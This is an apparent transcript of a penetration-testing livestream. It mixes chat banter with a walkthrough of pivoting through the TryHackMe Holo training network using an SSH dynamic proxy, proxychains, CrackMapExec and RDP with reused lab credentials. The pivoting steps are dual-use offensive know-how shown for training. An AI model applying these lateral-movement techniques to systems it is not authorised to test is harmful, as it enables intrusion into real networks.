A hunter must hunt.
Got some things to discuss before we get down to the hacking. You know what? We're even going to bring the hacker glasses back. Oh, God, I gotta clean them first. Jesus. Okay. She did not poop in my keyboard. Honestly, it was my mistake. Like an idiot. I ordered out today. And I got chicken tacos. And I only ate half of the last taco, then got up to do something. And I come back and the entire taco has been hollowed out. There's no chicken left in it at all. Like, it's just like, it was still closed and everything. Like, just the chicken was gone. She left everything else. All the toppings and everything. And she even, like, she didn't even try to hide it. She's just sitting on my chair. She's just sitting on my chair, looking at me. Like, I regret nothing. I regret nothing.
A hunter must hunt.
All right. Let's just go. Here, let's do this. Let's turn this shit down. Let's adjust the camera because I had to play with it a lot yesterday. That's probably fine. There we go. That looks better. Get a haircut for fuck's sake. Listen, Maticus. Listen. It's hard. It's as hard on me as it is on you. We're all like, let's all just take a deep breath. We're all gonna get through this together, okay? We're all gonna make it, bro. We're all gonna. I understand I look like a homeless person, okay? I understand it, okay? We're all gonna get through it together.
Star the Taco Huntress.
My goodness, Codingo, apparently in support of Star's endeavors, has brought 10 new cult initiates to us. Tapone, I guess it's BTH 30. I guess. I don't know what to tell you. Abud? A bud? I don't know what to tell you, Abud. Xerox, Aorez, Superman, Husky, Deadlock, Code Peak, and Eindry Welcome to the All Has Red Team, my friend. Thanks so much for supporting the stream, Codingo. You are, as always, ridiculously generous. Element IQ with the 2 months. Know Nothing with the 5 months. And Ominous with the first time. Prime Indoctrination. And not to be outdone by Codingo, Ominous has decided I must pay it forward. I must give 5 more cult initiates. Thank you so much, Ominous. That's so, so kind. Buddy, Sinister, Clown Baby, Vexed, Oscillator, and Black Lotus. Codingo! I can hardly even finish thanking the last person before more cult initiates are brought in by Codingo. How ridiculously generous, out of control. Hifley, Pokefan Games, Jonas, Azar, KKT, Joda, Dev Nelson, Christy, Bobhead in California. Welcome to the All Has Red Team, my friend. Thank you so much for supporting the stream. Codingo, as always, I am ridiculously grateful, but I do recommend that you get someone else to manage your finances. This is a lot of money to be giving a cult leader on the internet, and you should maybe feel a little bit bad about that. Well, maybe don't feel bad, but maybe just seek a financial advisor is my recommendation, okay? My goodness. Welcome, everyone. Have I gotten to all the generosity? Husky Hacks, I saw you gave 100 Tig Old Biddies. Thank you so, so much. And John Doe Norris bringing in the 1 Tig Old Biddy in support of Star the Taco Huntress. It was my fault, okay? If you know anything about this cat, you know that that this cat will do anything to get to chicken, okay? This cat goes nuts for chicken. So leaving the half-eaten chicken taco out, that was my mistake, okay? I have to understand that was my mistake. And she wasn't even trying to hide it either. She was just sitting there right next to it. She's just sitting on the chair that I was eating on, just looking at me. And I open up the taco, and it's completely been hollowed out. I mean, like, all the veggies are still there, but all the chicken is gone. She got to the chicken. That chicken is as good as dead. Don't look at me in that tone of voice. She's, like, looking around the corner over there. Like, you can't see her, but she's sticking her head around the corner looking at me. Don't, stop. You know what you did. Yeah, I know you don't feel bad about it. Why would she hide it? She's in her house. She's graciously, yeah, that's very true. Hey, man, can I ask you a question about windows? Sure, yes. If it's why mine are in the shot, it's because all of the rooms in my house or in my apartment have windows. And, therefore, we all have to deal with this glowing entity behind us at all times. Apparently doesn't want to be... She wants to be obese so bad. She tries so hard. She tries so hard and got so far, and in the end, it doesn't even matter. Thanks for your vid on YouTube about AV evasion. Brought me to your Twitter. Hey, thanks so much, man. I'm so glad you got here. I'm so glad that you have come. We're gonna. I'm planning on doing another video on some AV evasion tools later on this week. Actually, I heard a loud noise in the middle of the night. And it was yeah. She will actually not go into the trash for chicken bones. Of like if I ate chicken the day before, she will. And threw away the bones. I have to take the trash out right away. Otherwise, Star's going to get into it in the middle of the night, and I'll end up stepping on chicken bone that she just left out. I ran through the CRTO course this week. Any recommended Hack the Box or TryHackMe's I should do before I sit the exam, or just go for it? Well, the best thing for you is going to be do one of the Hack the Box labs, like either offshore or Rasta labs. Those labs are around the difficulty of CRTO. So if you want a practice environment, I would go for that. Otherwise, just any Active Directory box would be good. You live in her house and then you have the audacity to shame her for eating a little chicken. I didn't shame her. I said it was my fault. I said it was my fault. I know that she can't resist chicken. And I left the chicken out. It was listen. I'm victim blaming myself, okay? I'm self-victim blame, okay? All right. Why don't we talk about, what are we going to talk? Let's talk about What differentiates OSCP from CRTP exam? CRTP is going to be much more focused much more focused on Active Directory than OSCP is. OSCP is kind of a foundational introduction to hacking, and CRTP is more specialized. Generally, it's going to be more Active Directory, less Linux, more Windows, more AV evasion as well. My 4 cats want to see your cat. Okay, well, if she comes in here, I'll show off her the little scam in her apple bottom jeans. Let's say you want to pivot and do tunnel from Windows to Linux to reach the second interface on Windows. Can you help with that so I can scan the interface? Okay, do tunnel from Windows to Linux to reach the second. So to reach a second Windows box, we're actually going to do a little bit of that today. We're going to do a little bit of pivoting. We're actually going to have to do a ton of pivoting today, okay? I think it's going to be an absolute nightmare. It's going to be a pretzel of pivoting, and I'm going to explain why that's the case when we get into it. But it's going to be a lot of pivoting, so prepare your all-has pivots, because I see some of you already have them ready in chat, because we're going to be doing plenty of pivots. OSCP exam suggestions, manager time. Yep. I'm doing the OSWE right now. Any advice? If you're taking the exam right now, why do you have my stream on? That would be my recommendation. Other than that, do the course. Do the course. Make sure you understand it. Do the extra miles. I deeply recommend that you do the extra miles. I deeply recommend you do not skip the extra miles. You do all of them. One of the extra miles in particular ended up being foundational to the exam. Like it was, well, not foundational, but one of the flags on the exam turned out to be very similar to one of the extra miles, at least for me. I don't know what the exam is like now. I took it over a year and a half ago. What is pivoting? I'm new to this. So pivoting is when you leverage access to one machine to reach a different machine that you couldn't reach before. So let's say that you gain access to one machine that's inside of an isolated network. You can then leverage that machine to pivot to a different box inside of that isolated network that you could not reach otherwise. That is pivoting. What box are we doing? We're going to be finishing Holo on TryHackMe's. We've been putting off finishing Holo for a while. I've just decided today's the day. Today's the day to finish Holo. So we're gonna be talking about first of all, NTLM authentication, how it works, and what its weaknesses specifically are. And 2, we're going to be talking about the predominant exploitation for NTLM, which is NTLM relay, which is, as I understand it, the intended route to complete Holo. So we will be doing that today. Oh, let's do Stream Raiders. At least let me start up Stream Raiders really quickly. And we're also going to talk about the Security Weekly collab yesterday, because I feel like that needs to be discussed. Some of you guys raised some very valid concerns about that stream, and I want to make sure it's addressed. I want to make sure those concerns are addressed with you, my adoring cult faithful.
A hunter must hunt.
I feel that I owe you an apology. It wasn't professional of me to question the integrity of your appearance. You mean? Oh no! Let me. I'm going to explain it. It was not. You did nothing wrong. I'm going to explain the whole thing. Don't say anything about it. I'm going to explain the whole thing. Okay? I promise you, I'm going to explain it all. Because I do want to be completely transparent with all of you. So I'm going to explain what went down yesterday. And it wasn't all bad. It wasn't bad necessarily. But there maybe were some misconceptions, which are valid misconceptions that I'm going to clear up for you, okay? Alrighty. So we got Stream Raiders started. Mr. Porkchop with the first time Prime indoctrination into the cult. Welcome, Mr. Porkchop. I must remind you, Mr. Porkchop, that this is not a cult. I, for legal reasons, am required to remind you of that. And it is, in fact, an exceptionally passionate club of cephalopod enthusiasts. Okay? All right. So, yesterday, what happened yesterday? For many of you were not there, which is totally fine. I was doing a collab on Security Weekly's channel. Oh shit, I should have hosted myself. I guess I should have hosted them, but I just didn't think about it at the time. But so I was doing a collab with Security Weekly and a company called Polarity, that was sold to me as kind of, well, collabing with Security Weekly was a big one for me. Okay, I wanted to collab with Security Weekly. And Polarity, the CEO of Polarity, is a friend of mine, and he asked me, he said, Al, would you like to help work with Security Weekly and host this tournament that we're doing, right? And I said, that sounds like only good things. Like, work with Security Weekly, host a tournament. Like, I love to collab and support the security community. All of that sounded good for me, and I agreed. Okay, I agreed. It wasn't on one of my streaming days. Didn't have a problem with it at all. Okay, I didn't have any meetings in the way or anything like that. Didn't have a problem with it at all. Now, I very honestly, quite little was told to me about this. I was told that I was going to be commenting the attack portion. There was going to be 2 tournaments, basically. And the tournaments are really just, and we're going to get to what actually happened here shortly, because it was funny and appropriate. But we were using a platform called Aha Slides, and anyone could participate. Anyone in chat could have participated. And you could have won a samurai sword or cash or whatever, depending on. So basically, they had multiple choice questions that would ask you stuff like, which one of these hashes is likely a false positive on the defensive side, and on the offensive side, like, what EXE is being launched by this shell code that's executing, and things like that. So you would have used Aha Slides, and if you answered the questions quickly enough, you got more points than the other people who were answering them. And if you got the most points out of them all, you've got either cash or a samurai sword or whatever the prize was for that round or whatever, right? So I knew that's what was going to happen. I also knew that beforehand, before the Aha Slides portion, that I would be doing it was like an OSINT triage thing it was like a little showcase of OSINT triage techniques. That's what it was billed to me as. So I got Kali open on my machine, and I'm gonna show off things like AMAS and Maltigo and the Harvester. And like OSINT tools that I actually use on assessments, right? But it turned out the actual intent for this segment on OSINT was actually just to show off the product of the Polarity company, which is Polarity, their product. And I was a little bit embarrassed because it felt like I was kind of foisted into promoting a product that, I mean, I think that Polarity is a good product, and I think it's very interesting technology and could be helpful to the workflow of OSINT. But I was uncomfortable with the fact that that's all we talked about. Literally all the OSINT we went through was OSINT using Polarity. Like, keep in mind, I knew Polarity was hosting this event. I knew their product was going to come up. Like, I knew that was going to happen. But I didn't realize that my entire section of OSINT was going to be dedicated to Polarity. That it was a little uncomfortable, and many of you and some of you in chat rightly pointed out that it felt like a paid advertisement. I want to assure you, hand on my heart, okay, that I was not paid a single cent for that collab yesterday. I did it purely. I did it purely to help a friend. Yeah, hand on cock. Yeah. I did it for this because it was. Again, I knew the tricky part is I knew Polarity would be I knew Polarity would be involved. I just didn't know it was like going to be basically a demonstration of the product. That was not my understanding, and it came off like a paid advertisement for this product. And I assure you that I was not paid. I was put on the spot, and I decided to suck it up and say nice things about Polarity, because I do genuinely think it's a good product, and I think it could be helpful once it's because I was on stream. I was live, dude. It's not like I could say, wait a minute, this is not what I was sold by. This is not what I was sold on, and just back out on it. Like, I can't do that. Like, I was already live. I was put on the spot. Again, very little was discussed about this segment ahead of time. Basically, it was all off the cuff. It was me and it was Tyler from Dark Element. It was me and Tyler from Dark Element. And it was basically all off the cuff. We basically didn't have anything planned. And I didn't realize that it was just going to be, hey, here's how polarity works, or whatever. I figured polarity would come into it, of course, but I didn't expect it to be purely a product showcase, okay? I want to assure you guys that, look, I don't do what I do. Can we all ask you to work for free? Like, I don't work for free. You guys, I allow you guys to throw extra money my way if you choose, okay? But I'm not in this to make money. I make it very clear that I'm not in this to make money. If I was being sponsored with Polarity, I'd tell you to your face, okay? They did offer me a sponsorship. He even offered me employment. He offered me a job. I said no to both. And I said, I'm only comfortable. I'm comfortable doing a team up and a collaboration, but I'm not comfortable being sponsored. Okay? I'm not trying to push any products to you. I'm not trying to push Polarity to you. The comments you heard me say yesterday were me genuinely saying that Polarity could help you in your operation if you integrate it into your workflow. Okay, that's it. Those were genuine comments that I genuinely believed, and I was not being paid to say. I'm not trying to push any of that on you. I'm not trying to... Listen, if I wanted to make money off of you, I would pull an Ice Poseidon and start a cryptocurrency. Okay? I'm not trying to make money. I'm not trying to scam you guys out of money. I'm not trying to make any money at all off of you. Do I make a little bit of money? Sure. But it's not why I'm here. I'm here for you guys. I'm here because I enjoy having a community around me. I enjoy you guys. So that hopefully explains what happened yesterday. It was a weird situation I was put into. Next time, I'm definitely going to inquire more as to my role in these little collabs that I'll be doing. Or start rapping horribly. I hear that works well in recent news. Actually, yesterday, the best part was Chris Turner. They got Chris Turner in there after the tournament to do a freestyle rap, and he did part of it about Cthulhu. Not joking. Well, he asked us all to give topics for him, and people came up with some really good random ones, like the neuralizer from Men in Black, and naturally, I said I want to hear how Cthulhu would freestyle rap. So he even did like a little accent and everything. It was. Damn, I wish I saw that. I'm sure it's in Security Weekly's VODs. If you go over to Security Weekly's Twitch stream, you can look at the VODs. Just go towards the end of the VOD yesterday and you'll see it. It was pretty funny. Pretty funny. And also, first tournament yesterday, okay? We're in the first turn. So the first tournament was like a defensive one. Again, it was on AHA slides, right? This is fucking hilarious. Are you guys ready for this? You guys are fucking ready for this? So, there were two people who were basically obvious outliers. One guy named Benjamin, and one guy named and Jin and Miskatonic, who I've met in real life and is a good dude. Jin, and who has an extremely excellent name. They were basically vying for first place for like the first 3 or 4 questions. And then on the fourth or fifth question, this guy Zach, who wasn't even on the board, comes out of nowhere with 800,000 points. Now, the way this works is that the most points you can get on any question is 1,000 points. So, if you do the math there, we ran the numbers on this, and it's not actually possible under normal circumstances to get to 800,000 points, even with all 10 questions. And then the next question, and I shit you not, After the next question, he had 900 quadrillion points. Everyone else has got like 3K. And I shit you not, that's the actual number. That is not an exaggeration. I worked it out on stream. It was the number of zero. It was like 889 quadrillion points and some change. Do we have a clip? It's on Security Weekly's Twitch channel. Go into the Security Weekly's VODs and you can find it. But I was laughing my fucking ass off, dude. Because it was very obvious. It was done in the best possible way. Zach was a class act, okay? Zach was a fucking class act, okay? Because it was like really obvious that he had found some kind of exploit in the platform and just had jacked up he inflated his points to such a ridiculous number that it was very obvious that he'd exploited the platform. And I was like, we actually had a small debate like on the stream, like, who do we give it to? And I was like, he won. Zach won. I would call that a win. This motherfucker's out here with burp, capturing requests, and capturing requests and pen testing this shit in real time. And I would say that I'd call that a win. So it turned out we got Zach on the line. Zach came on. We got Zach on the Zoom call. After it was over, and he was like, yeah, it turns out it's all handled client side. So the client so every web browser just keeps track of the points on its own and just reports the points to the server. It turned out that the entire thing was basically just handled client side. So you could also modify things like the time left remaining. And part of the reason you got points was not only getting the correct answer, but also getting it in the shortest amount of time. So you could inflate the time to a ridiculous time, like 20 days or something, and you'd get like 800,000 points. It was quite funny. And he explained it all, and we were even talking to him. God bless him. Zach wasn't even like. He'd never even submitted a bug bounty or something. He was only doing it for fun. Like he just happened to have burp open as he was taking the quiz. You know, as you do, just randomly proxying your traffic at all times. He explained that he just sort of randomly proxies his traffic with burp all the time. And he just saw some discrepancies in the JavaScript file and just started to play with the fields. And we had to sort of. It was very wholesome because we got to like guide him through the process of responsible disclosure and stuff like that. But it was very funny. It was perfect for a hacking tournament. I even said I'm so glad that happened because I'm not saying it was boring, but it was much less interesting if someone hadn't hacked the platform to give themselves 900 quadrillion points. That was more entertaining for me. So that was what happened yesterday. Again, head over to Security Weekly's Twitch stream. They have their own channel. And check out the VODs if you want to see that in real time. I'm sure the VODs are there and viewable. That was pretty fucking cool. Are you guys ready to do some fucking NTLM relay? Are you guys ready to comprehend this lunacy that is about to be arrayed in front of your eyes? As a glasses wearer, could I ask about your glasses? They're orange tinted. Does that help with screen fatigue or something? It helps me comprehend the eldritch mysteries that I spend all day looking at. It protects me from the visage of the old ones. No, I'm kidding.
Yes.
It does help with blue light fatigue. Oli and Whisper with the 3-month Prime re-indoctrination. Welcome back. Welcome back to the All Has Red team. Hey, Storm, thank you for the follow. Whew. Whew. Almost ready, but could you tell us more about this great OSINT tool called It is genuinely a good OSINT tool. Now, if you're going to ask me if I use it for my real assessments, no. I have not integrated polarity into my workflow yet. I do think it's a good tool, though, okay, in fairness. And I encourage you to give it a try. Is RootMe CTF's good for beginners? It's kind of old. I would recommend TryHackMe for most beginners. I'm not saying RootMe is bad. It's just they're kind of old. They were on the scene like when Over the Wire was on this. Was one of the only other games in town. Over the Wire is also good. Yeah, I would say RootMe and Over the Wire are both good CTFs. I would say TryHackMe is a better platform for that stuff these days. All right. So. Okay, so first we have to start up Holo. We have to start Holo back up and get back to where we left off last time, which was like 3 weeks ago, I feel like. Fucking forever. TryHackMe Holo. Okay. So first we have to get back to where we were. So we have to, like, I still have credentials, so we should be okay. Would you like me to use my download Twitch script to pull the security live stream so you can stream it, save it for later? Sure, I guess. Yeah. I mean, I assume Security Live is gonna post it on their YouTube or whatever. So I don't really plan on posting it anywhere. But it was a good time. But mainly because Zach hacked the fucking platform. That was pretty funny. Hello, King Zeldris. Good to see you. All right, I'm logging into TryHackMe right now, and then we're going to start up the Holo network. Holo recap. We're going to go through a recap. Don't worry. Holo is a whole network of, like, I think 7 or 8 machines. We've hacked most of it. There are 2 machines missing, I believe. So we'll be finishing up those 2 machines today, I hope. Although I can already see a problem that we're going to run into. Because it is tricky doing NTLM relay from a compromised host. Is it possible? Yes. It's tricky, though. So what I might... And I don't have Cobalt Strike to help me. Under normal circumstances, I would have Cobalt Strike to help me. Which is key. I might be able to do it with Meterpreter and playing with the Windows firewall. I might. So we're gonna look into that a little bit. If I can play with the Windows firewall to get it to work, we'll do that. Since I don't have Cobalt Strike, I have to kind of no daddy Cobalt Strike. I mean, I could use Cobalt Strike. I don't give a fuck what you people think. I would use Cobalt Strike, but I'm a little. But I do see the plight of the people who complain that I use Cobalt Strike on stream because they don't have access to Cobalt Strike, which is reasonable. It is reasonable to critique that people do not have access to Cobalt Strike. That being said, yeah, I could probably do it with Chisel as well. Again, it's going to be a mess of port forwarding. There are 2 things there's going to be one of 2 things, okay? And you know what? We'll talk about that when we get there, okay? We're going to talk about that when we get there. I still have to get back to where we were in Holo, which is going to take a little bit of time. So, and then we'll talk about how NTLM relay works. It's going to be, but given the way the network is laid out, it's going to be a mess of port forwarding. And it's going to be difficult for you guys to understand. And I do apologize for that. But that's just sort of the reality of things. Rostamouse has that incredible article on NTLM relay using Cobalt Strike Beak. Yeah, that's what I would... Husky, that exact article, or that exact technique, is what I was referring to when I said Cobalt Strike would help me with this. That's exactly what I was thinking. Port Bender is, as far as I know, only works in Cobalt Strike. It's made to work in Cobalt Strike. And Port Bender is the key that makes the entire thing work. So I'm going to need to preempt the need for Port Bender. And I'm not really sure how that's going to work yet. I'll figure it out. Blue Squadron. 16 months, I understand some of these words. Okay, so those who don't know... Oh, Blue.
I understand some of these words.
Blue. I keep forgetting. We need to talk about when we're doing the I'll get with you off stream. Okay? But we need to talk about when we're doing the League of Legends thing, okay? My community, my cultists are becoming antsy, okay? For those who don't know, Blue Squadron is my real life brother, like as in we literally came out of the same mother. I'm doing a League stream this Saturday. I don't know about you. Oh my god, he's back into League? Okay, I'm gonna have to get with him off stream. I'm not gonna have a conversation with him about it right now, but we'll figure it out. But Blue had we've needed for a while to do a bonus stream. I promised you guys a bonus stream where me and Blue would play League of Legends with viewers. We have not done it yet because the holidays happened, and then Blue got COVID. Which it seems like he didn't die from, so that's good. Unless these are messages from beyond the grave. But hopefully if he's feeling better, we need to, and streaming again, it's a good time to think about doing that thing. I'll get, again, I'll get with you off stream. I'll get with you after stream, okay? How does he live with the culture shock? Should we be more toxic? Yes, probably. You're probably going to want to dial up the toxicity for that bonus stream. Again, it's not going to interfere with my average hacking streams. It will be a bonus stream on one of my off days. Probably not this Saturday. It'll probably be it'll probably be in the future. I'll get with Blue off stream and we'll talk about it. Thank you for the 16 months, by the way. Rojak, thank you for the follow. Day Night Day with the follow. Thank you so much. All right, let's get back into Holo. So with Holo, the key to remember with Holo is that it's not just one machine. Most CTFs you're going to be doing are just one machine. Oh, my commentary in League is absolute goal. Al runs it down. Listen, okay? Listen. I was about to say I resent that remark, but it's more like I resemble that remark, and I understand that, and it's fair. In fairness, I play champions that basically require you to run it down, okay? It's the champions forcing me to do it. Unless I'm going to play Nasus and AFK farm in top lane for the entire game, which also is appealing. I have to basically run it down. I got to get them kills. I got to get them. All right, Holo. Alrighty, so we are starting up Holo here. I'm starting the network up. Now, feel free to start a wager in chat of if I'll remember to extend it before it dies on me, because I think every single time we've done Holo, I've let the network die on me. So just get in on that. Face roll the keyboard, a timeless classic. Listen, I'm not a Katarina player. I'm not a filthy, unwashed Katarina player. Okay, we're literally, the game consists of slamming your face against the keyboard over and over again until everybody is dead. I did have to press the buttons in a certain order, in fairness, okay? But yeah, that was generally my modus operandi, was to play champions that were all about that shit. Al strikes me as a Vayne player. Blue actually was a Vayne player, or maybe is. I don't know. He switched from, he was an AD carry, or marksman they're calling them now. Back in the, back in the day, we used to call them AD carries and we liked it. Okay? God damn it, I have to get a new VPN file. Okay, I'm still getting a new VPN. I'm getting connected. We're just talking about stuff while I'm getting connected here. Back in the day, we called them AD carries and we fucking liked it, is my point. But then he decided to stop playing AD carry and played Evelyn instead. I don't know why you would voluntarily go into the jungle. The jungle is a bad place, okay? We don't like the jungle, okay? Nobody likes the jungle. If the game goes badly, the jungle is the first person you blame, okay? Every single time. Nobody likes the jungle. Let's just regenerate it here. An anonymous gifter, my goodness. You psychopath, you madman.
A hunter must hunt.
Best Sphinx, X-War plays M.Sec, Femi, and O Cortez. Welcome to the All Has Red team. Can't get blamed if Tad is off. Yeah, if Tad is off. Yeah, I heard they brought in voice chat. Do people use... Do they still have voice chat in there? Honestly, I played League a few times several months ago with Helen of Tor. And and I played with Helen of Tor briefly, like several months ago, for like 3 or 4 games, and in one game we just had this absolute chad of a Garen bot that just ran it down at her every time. Like the Garen bot would just run like past 2 turrets to get to her. It was very funny. And all she was like, I can't do anything. He just jumps on me and spins. And I'm like, that's the Garen experience right there. Welcome. Welcome to League of Legends. It was again very funny. I'm in kind of I confess I am in kind of a difficult position in playing League of Legends, because I put basically like a whole bunch of my time. Most of my League time was on one champion, and then they later reworked that champion. So she's entirely different now from where she was before. And I've played the new version very little. So it almost feels like I've never played this hero at all. That's how different she is. Yeah, it was a Kali. Which you can tell because... Yeah. I do name my Kali instances Akali, and that is the reason why. It's just nostalgic for me. But I used to play old Akali a lot. And then they reworked her, and she's much cooler and more interesting now, but also way harder. I'm in kind of a weird place, so I'm probably going to play Akali when we play with Blue on stream. And I probably will be just running it down. Like, it's probably going to be rough. I honestly probably should practice a little bit, but I think it'd be funnier for you guys if I didn't. Honestly, I think it'd be funny for you guys if I didn't practice with her and ended up just running it down. So I think I just won't. I think I'll just leave it and let you guys experience the mayhem. Her builds are... Oh, we're building Tank Akali again? Shit, I love the days of Tank Akali. I remember the old days when I used to get Hextech, Gunblade, and Warmogs and be literally fucking unkillable for the entire game. Like, literal, like, I have 3k HP, and I heal back every time I use an ability. So we're back with Tank Akali? Yes! I'm kidding. I know you guys don't understand what I'm talking about. It's fine. Okay? It's fine. It's fine. Again, I'm probably just gonna play Akali and run it down. What are we calling it? Holo? Okay, yeah. T-Mux, new Tech S. Okay, let's get started. So. Sorry to add to the tangent. It's not really a tangent. I had to reconnect to TryHackMe anyways. Yeah, so that took a little bit of time. I guess we'll do Stream Raiders really quickly as well. Maybe I'll play Diana instead. But Diana changed too. They moved her R to her E. And her E is her R. What is happening? Nothing is the same. It's like, I feel like Gandalf in Fellowship. He's like, I have no memory of this place. That's what it feels like. Don't be afraid of change. I'm afraid of change that I have to experience on stream in front of a whole bunch of people. That's all I'm afraid of. I did see some Volibear. Volibear looks fucking cool now. Dystopia with the follow. Thank you so much. Welcome to the welcome to the stream. Alrighty, so we're getting stream writers done. And then we have to remember how we actually compromise this shit, because it's been a little while since we've been in Holo. So, if you didn't see our previous streams on Holo, you should be aware that Holo is not a box. Holo is an entire network. It's an entire simulated Active Directory domain. We gained initial access through a web application, which dropped us into a Docker container, which we then escaped from onto the host, and we use that host to then pivot to the other hosts in the network. And we compromised, I think, 2 more, and then we with some lengthy segues into antivirus evasion and so on to do it. So we have a lot to get caught up on. We have to get back into the network again. And I do have credentials, so hopefully we can use the credentials to get back in. All right, back to this. Okay, Streamlabs. Okay, close. Thank you. My goodness! I just saw Excalibur. 10 more cult initiates, my friend. My friend. You truly do live up to your name. You're like a strange woman lying in a pond distributing gift subscriptions. Thank you so much, Excalibur. This is no basis for a system of government, but it is a good basis for a Twitch stream. Thank you so much, Excalibur. Ancient Eclipse, Shamaran, Obito Uchiha, Nikue, Sinbander, Red Skull, Master Shakes, Sharyuga, Ingokul, or whatever that last letter is, and Kernstrot. Welcome to the All Has Red team, my friends. Thank you, supporters. Thank you once again, Excalibur. You are so kind, my friends. Okay, I think we do have credentials here. So let's go back in. Oh, by the way, for those of you who like my cheat sheet, I am in the process of reworking it so it's in a better format. Right now, it's just like, looks like this. It's just a big fucking single sheet full of stuff. And I understand that can be kind of hard to read and navigate. So I'm in the process of reorganizing it and adding more stuff. So yeah, look out for that in the next several days. Here's Holo. Okay, so we did get some credentials here. We see some credentials. This is all from originally. As I said, we had to compromise a web application. We got remote code execution in a web application. That's what you see here. We dropped into a Docker container. And here is the credentials for the Linux host, which is 10.200.137.33. So if you don't remember, let's just remind ourselves. This is what it looks like. This is what the network looks like. This is the domain controller, which it says we've compromised, even though we haven't. This lies. Okay, this lies. So this is a Cobalt Strike thing, and it's an Armitage and a Cobalt Strike thing. When in Cobalt Strike, when you get your graphical representation of your compromised hosts looks like this. And when you have administrator on a host, it gives red around the edges and has like lightning bolts. That's where that comes from. King Zeldris, you've been indoctrinated by Ominous. Welcome to the All Has Red team. Thank you so much. I freaking love this community. Hey, Mill, it's great. We love you, okay? This is all love, all wholesome love in here, okay? And Maticus Maximus comes in here. Comes in here and just breaks up the wholesomeness. Okay, so we originally compromised this server. This was our initial foothold. This is actually a Docker container that's running on this host. That's why this is connected to this. But we were able to pivot from the Docker container onto the host. And from there, we were able to compromise, I think it was this server first, and then this server. So let's get access to this server again. I believe I believe we cracked the Etsy Shadow password, if I remember. I think this is the password for that. So let's go ahead and SSH. It remembers. That's good. This is so that we don't have to go through the process of... just delete the known hosts file. Okay. And let's make sure we get the password correct here. This is so that we don't have to re-compromise these hosts again, which takes time. And we don't want to be wasting our time with that. What the fuck? Don't tell me they changed the Linux-admin. Oh no, I copied the username. My bad. This is the password. There we go. So we are logged in. Again, to remind you, we are currently logged into this server. This server, these three servers are not reachable by us. We cannot, if I try to ping, for example, 10.200.137.31, yeah, we cannot ping this host. And we can't ping... got so many fucking applications open. These four hosts, actually, are not reachable by us. This is the domain controller. This is ultimately the box we're trying to get to comletely compromise the domain. We are currently inside this one. This box can reach us. We can reach this box, as evidenced by the fact that we just SSH'd into it 5 seconds ago. We just SSH'd into this, and we're going to use this one to compromise this machine here. Hopefully that makes sense. So we need to set up port forwarding again. We're going to need to, since we cannot... this is where the pivoting comes in. Since we cannot reach these four hosts except through this host can reach these hosts. Like if we were to ping, for example, this 10.200.137.31 from here, we see we get pings back, right? So now we can reach these hosts, but only through this host. This is basically standard ops for a red team assessment or a penetration test. It's basically standard ops that you're going to have to pivot at some point. An understanding of port forwarding and tunneling is very, very important. So we're going to set up a dynamic tunnel that allows us to reach these hosts. Okay? And the way we're going to do that is simply through SSH. We could use Chisel. Yeah, Bruno, we could use Chisel, but in this case, we have SSH access to the host. So SSH has that capability built in. And it's going to be stealthier if we just use SSH, because that's a known technology that people are expecting to see. With Chisel, we have to drop a rather large binary onto the server. We have to make a crazy connection that might show up in any kind of network monitoring logs. We're not going to want to do that. That's quite loud. When possible, we want to use... we want to live off the land, so to speak. Use tools that are already present. So we can enter a bit of a configuration dialog by entering tilde capital C. Tilde C. Why does this not work? There we go. It worked that time. Okay. So we tilde C just like this. It should put you into this SSH dialog. And we're going to say tac D for dynamic proxy. And we're going to say port 1080. Okay. So what we've done is we have established a socks proxy. Okay. And I know what that doesn't mean. I know what you're like, socks. I'm not wearing socks. I didn't go out today. Why would I have socks on? It's a computer thing, okay? It's a computer thing. You don't need to go put socks on, okay? You don't need them, okay? All right, so we're gonna I'll show this off. Netstat tag ANP TCP. And you can see that port 1080 is now listening on our Kali host. And what that's going to do is 1080, so SSH is listening at port 1080. We can see SSH right there, is listening, and it is going to basically act as a SOX proxy for us that allows us to tunnel our traffic to other hosts. Does that make sense? Does that make some sense, chat? Hopefully that makes sense. Let's try to use our good friend CrackMapExec, and let us attempt to... Let me try and reach... let me set up my proxy chains dialog first, because otherwise I'm going to forget. Vim proxychains.conf. This looks fine. This configuration looks fine. And first I'm going to try to CrackMapExec SMB, and let me just keep the TryHackMe thing open over here so that I can see all the IP addresses. Okay. 10.200.137.31. Actually, we're going to try to reach 3.5. Let's do 10.200.137.35. So let's see if we can reach that. And alas, CrackMapExec doesn't come back with anything. It appears that that host does not is unreachable. However, if we use our good friend proxy chains, and looky there. Now we can reach it. Proxy chains is tunneling our traffic through this proxy, which is SSH, which is tunneling my SSH traffic through this host that we've compromised, and we can now reach all of these hosts. Does that make sense, chat? Is everyone following so far, like at a high level, what's happening here? Ready, Set Data, thank you for the follow. Cthulhu Fountain to you. Cool, right? Okay, if you have questions, please make sure to ask. It's okay, I don't mind explaining, that's why I'm here. Okay? I think proxy chains is super cool. Highly recommend getting familiar with proxy chains. I use proxy chains every fucking day, dude. Proxy chains is a daily driver for me. If I'm on network, on a red team assessment, proxy chains is a daily driver for me. It is a core tool. Is proxy chains running in the... No! Proxy chains only runs on my Kali machine. All proxy chains is doing is redirecting the CrackMapExec network requests through the proxy server we've set up. This is proxy chains is a core tool for red teamers, because when you're a red teamer, in order to live off the land, or sometimes you have to run tools, and you really don't want to run tools on the host unless if you can avoid it. You really aggressively do not want to run tools on the host if you can avoid it. Does that make sense? You want to set up a proxy, use the host as a proxy, and run like Impacket from here. That's not 90% of my exploitation is through CrackMapExec and Impacket. Once I establish a beachhead, if you will. Does that make sense? On the actual host, I typically use beacon object files. I usually bofnets. Very few people in chat are going to know what bofnet is. But that's if I have to run something on the host, bofnet is a go-to. Mike Shudo, thank you for the follow. It's the sneakiest way to do it. You don't have to worry about antivirus evasion. You don't have to worry about endpoint protection. All you have to worry about is what network traffic you're putting out. Alrighty. So we can now reach this. I think we have credentials for this already, because we compromised a different host through another web application. Here we go. Wadamet nothing to worry, I believe, is the credentials. And then I think we escalated with this CVE. I think. These credentials were gained through Mimikatz on a different host, if I remember right. We're not doing the whole network right now. I'm just getting us back to where we were. And it looks like we can authenticate. Can we... I think we can RDP, actually. So proxy chains for... X-free RDP. Wadamet. (137). Yes, we accept that public key. And you can see that we are able to RDP into this machine. Okay? Oh, so SSH is doing the magic, yes. SSH is proxying for me here. SSH has very useful port forwarding and proxying. RDP tunneled, yes. This RDP is being tunneled through the SSH session. Where is... I lost it again. Where did it go? We have an SSH session with this box. Our RDP is being proxied to this box through this machine. We're not talking directly to this machine. This is the DC. I keep trying to pretend this is us, okay? We're not. We're out here somewhere, okay? We're out here in Rilya, okay? And Cthulhu is rising from 